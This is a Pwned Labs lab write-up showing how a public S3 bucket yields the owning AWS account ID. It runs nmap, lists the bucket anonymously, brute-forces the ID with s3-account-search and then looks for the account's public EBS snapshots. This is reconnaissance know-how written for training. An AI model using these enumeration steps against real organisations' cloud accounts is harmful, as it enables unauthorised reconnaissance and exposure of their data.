PWNEDLABS Identify the AWS Account ID from a Public S3 Bucket

Real-world context

If a hacker gets their hands on an AWS Account ID, they can try to figure out the IAM roles and users tied to that account. They can do this by taking advantage of detailed error messages that AWS services spit out when inputting an incorrect username or role name. These messages can verify if an IAM user or role exists, which can help hackers compile a list of possible targets in the AWS account. It's also possible to filter public EBS and RDS snapshots by the AWS Account ID that owns it.

Nmap

nmap -Pn 54.204.171.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-07 01:33 EET
Nmap scan report for ec2-54-204-171-32.compute-1.amazonaws.com (54.204.171.32)
Host is up (0.13s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 14.86 seconds

Access the website

Inspect the source code and find images being referred from s3 of mega-big-tech

https://mega-big-tech.s3.amazonaws.com/images/workpro1.jpg

Access the S3 Bucket

https://mega-big-tech.s3.amazonaws.com/

<ListBucketResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/">
<Name>mega-big-tech</Name>
<Prefix/>
<Marker/>
<MaxKeys>1000</MaxKeys>
<IsTruncated>false</IsTruncated>
<Contents>
<Key>images/</Key>
<LastModified>2023-06-25T22:40:57.000Z</LastModified>
<ETag>"d41d8cd98f00b204e9800998ecf8427e"</ETag>
<Size>0</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/banner.jpg</Key>
<LastModified>2023-06-25T22:42:34.000Z</LastModified>
<ETag>"3ad5c014c01ffeb0743182379d2cd80d"</ETag>
<Size>3184176</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/notepro1.jpg</Key>
<LastModified>2023-06-25T22:42:35.000Z</LastModified>
<ETag>"f5435f26a11fac38006d8fe32ed75045"</ETag>
<Size>941294</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/notepro2.jpg</Key>
<LastModified>2023-06-25T22:42:36.000Z</LastModified>
<ETag>"c7b217afa365714334597643889c5daa"</ETag>
<Size>1660205</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/notepro3.jpg</Key>
<LastModified>2023-06-25T22:42:37.000Z</LastModified>
<ETag>"11acc403ec7efabdf2743404e1fc6be7"</ETag>
<Size>490794</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/notepro4.jpg</Key>
<LastModified>2023-06-25T22:42:38.000Z</LastModified>
<ETag>"2ba1a84a0908e91bec8d05981c28fc40"</ETag>
<Size>2415092</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/phonepro1.jpg</Key>
<LastModified>2023-06-25T22:42:39.000Z</LastModified>
<ETag>"8b2541f6138dd34e392f45fc6ab8ba6f"</ETag>
<Size>1003564</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/phonepro2.jpg</Key>
<LastModified>2023-06-25T22:42:40.000Z</LastModified>
<ETag>"f9bf19e16a9a31a6754d7c55d0576ec4"</ETag>
<Size>1277058</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/phonepro3.jpg</Key>
<LastModified>2023-06-25T22:42:41.000Z</LastModified>
<ETag>"c5e3b974eb2a8cc3cb6cd7f14a358419"</ETag>
<Size>2322525</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/phonepro4.jpg</Key>
<LastModified>2023-06-25T22:42:42.000Z</LastModified>
<ETag>"e77b77f088be31b907562c1c08d3c1ea"</ETag>
<Size>4080373</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/watchpro1.jpg</Key>
<LastModified>2023-06-25T22:42:43.000Z</LastModified>
<ETag>"8c6b69baa95f5a7ed0f9d2e1dae73160"</ETag>
<Size>1160096</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/watchpro2.jpg</Key>
<LastModified>2023-06-25T22:42:44.000Z</LastModified>
<ETag>"ab66d316fbdfa90eea53e89855dc243f"</ETag>
<Size>2877784</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/watchpro3.jpg</Key>
<LastModified>2023-06-25T22:42:46.000Z</LastModified>
<ETag>"a105349b350b257b05438dbc1c8fbe4d"</ETag>
<Size>3232387</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/watchpro4.jpg</Key>
<LastModified>2023-06-25T22:42:47.000Z</LastModified>
<ETag>"f5315cb77b5de5a74c13417e185d3953"</ETag>
<Size>3041540</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/watchpro5.jpg</Key>
<LastModified>2023-06-25T22:42:49.000Z</LastModified>
<ETag>"f137be90eec86dd71da37f25bdc5452e"</ETag>
<Size>3400957</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/workpro1.jpg</Key>
<LastModified>2023-06-25T22:42:50.000Z</LastModified>
<ETag>"ee9140f394608d8ed638c9b39b9c1c4f"</ETag>
<Size>1632585</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/workpro2.jpg</Key>
<LastModified>2023-06-25T22:42:51.000Z</LastModified>
<ETag>"fd33607a6406f4a6cb1550cba96ea200"</ETag>
<Size>1081259</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/workpro3.jpg</Key>
<LastModified>2023-06-25T22:42:54.000Z</LastModified>
<ETag>"78fec3d6d2c81294346fa618ba0caf00"</ETag>
<Size>1599810</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
<Contents>
<Key>images/workpro4.jpg</Key>
<LastModified>2023-06-25T22:42:56.000Z</LastModified>
<ETag>"9a70d62b2f2bd2bf6604943bde09f6bd"</ETag>
<Size>1144134</Size>
<StorageClass>STANDARD</StorageClass>
</Contents>
</ListBucketResult>

Do connect with the received AWS account

Use "aws configure"

aws sts get-caller-identity
{
    "UserId": "AIDAWHEOTHRF62U7I6AWZ",
    "Account": "427648302155",
    "Arn": "arn:aws:iam::427648302155:user/s3user"
}

Install and use s3-account-search

https://github.com/WeAreCloudar/s3-account-search

python3 -m pip install s3-account-search

s3-account-search arn:aws:iam::427648302155:role/LeakyBucket mega-big-tech
Starting search (this can take a while)
found: 1
found: 10
found: 107
found: 1075
found: 10751
found: 107513
found: 1075135
found: 10751350
found: 107513503
found: 1075135037
found: 10751350379
found: 107513503799

Find S3 Bucket Region

curl -I https://mega-big-tech.s3.amazonaws.com
HTTP/1.1 200 OK
x-amz-id-2: 5xhnucqe++L3eBraV4DXjJs0eBpB3QHSRqwurRrSa6fAG3ezE05/Dr2FkXfCWQ03u7mSOF4zwh/VAKWKX3aeEg==
x-amz-request-id: RXYQ6QPVE856HYMV
Date: Wed, 06 Mar 2024 23:54:16 GMT
x-amz-bucket-region: us-east-1
x-amz-access-point-alias: false
Content-Type: application/xml
Server: AmazonS3

Log into the AWS management console in your own personal AWS account and make sure that the `us-east-1` region is selected.

Then search for the EC2 service. Click the service and in the EC2 dashboard, in the left-hand menu, select Snapshots under the Elastic Block Store menu item. In the dropdown list, select Public snapshots, paste the discovered AWS account ID into the field and hit enter/return. After waiting a minute we get a hit and see that the company has a publicly exposed EBS snapshot! PWNED!

PreviousWriteups NextTryHackMe Anthem

Last updated 11 months ago

hashtagReal-world context

hashtagNmap

hashtagAccess the website

hashtagAccess the S3 Bucket

hashtagDo connect with the received AWS account

hashtagInstall and use s3-account-search

hashtagFind S3 Bucket Region

hashtagLog into the AWS management console in your own personal AWS account and make sure that the us-east-1 region is selected.